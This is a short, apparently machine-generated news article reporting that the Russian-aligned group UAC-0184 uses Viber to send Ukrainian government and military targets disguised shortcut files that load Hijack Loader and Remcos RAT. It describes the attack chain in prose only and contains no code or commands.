Ethical Hacking News
Russian-aligned hackers have been using Viber as a platform to launch targeted attacks against Ukrainian military and government entities, highlighting an escalation of cyber warfare. The threat actor, known as UAC-0184 or Hive0156, has employed various tactics, including phishing emails, malware loaders, and remote administration tools to compromise systems.
Russian-aligned hackers are using Viber to launch targeted attacks against Ukrainian military and government entities. The hacking group, UAC-0184 or Hive0156, has been associated with malware distribution through messaging apps like Signal and Telegram. Viber is being used as an initial intrusion vector for distributing malicious ZIP archives containing Windows shortcut files disguised as official Microsoft documents. The attack chain employs techniques like DLL side-loading and module stomping to evade detection by security tools. The malware, Remcos RAT, enables attackers to manage the endpoint, execute payloads, monitor activities, and steal data.
In an alarming development, Russian-aligned hackers have been utilizing the popular messaging platform Viber to launch targeted attacks against Ukrainian military and government entities. According to recent findings from the 360 Threat Intelligence Center, this threat actor has been actively involved in conducting high-intensity intelligence gathering activities against Ukrainian departments in 2025.
The hacking group, known as UAC-0184 or Hive0156, has previously gained notoriety for utilizing war-themed lures in phishing emails to deliver Hijack Loader malware, which subsequently infects the victim's system with Remcos RAT. This particular threat actor is often associated with leveraging messaging apps like Signal and Telegram as a delivery vehicle for malware.
In this latest escalation of cyber warfare, Russian-aligned hackers have opted to utilize Viber as an initial intrusion vector to distribute malicious ZIP archives containing multiple Windows shortcut (LNK) files disguised as official Microsoft Word and Excel documents. The LNK files serve as decoy documents designed to lower the victim's suspicion, while silently executing Hijack Loader in the background by fetching a second ZIP archive ("smoothieks.zip") from a remote server via a PowerShell script.
The attack chain involves a multi-stage process that employs techniques like DLL side-loading and module stomping to evade detection by security tools. The loader scans the environment for installed security software, such as Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot, and Microsoft, by calculating the CRC32 hash of the corresponding program.
Once establishing persistence via scheduled tasks, the loader subverts static signature detection before covertly executing Remcos RAT by injecting it into "chime.exe." This remote administration tool enables attackers to manage the endpoint, execute payloads, monitor activities, and steal data. According to the 360 Threat Intelligence Center, this particular malware has been frequently used by various malicious actors for cyber espionage and data theft activities.
The use of Viber as a delivery vehicle for malicious ZIP archives highlights an evolution in the tactics employed by threat actors. As messaging apps continue to play a significant role in modern cybersecurity threats, it is essential for users to exercise increased vigilance when interacting with unfamiliar messages or attachments.
Related Information:
https://www.ethicalhackingnews.com/articles/Russias-Cyber-Warfare-Escalation-How-Viber-Became-a-Target-for-Ukrainian-Military-and-Government-ehn.shtml
Published: Mon Jan 5 12:21:20 2026 by llama3.2 3B Q4_K_M
